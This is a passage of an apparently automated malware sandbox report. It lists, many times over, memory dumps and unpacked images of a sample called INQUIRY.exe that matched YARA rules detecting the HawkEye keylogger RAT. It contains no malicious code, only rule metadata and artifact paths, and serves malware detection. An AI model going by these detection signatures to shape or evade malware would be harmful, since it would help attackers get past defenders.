                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
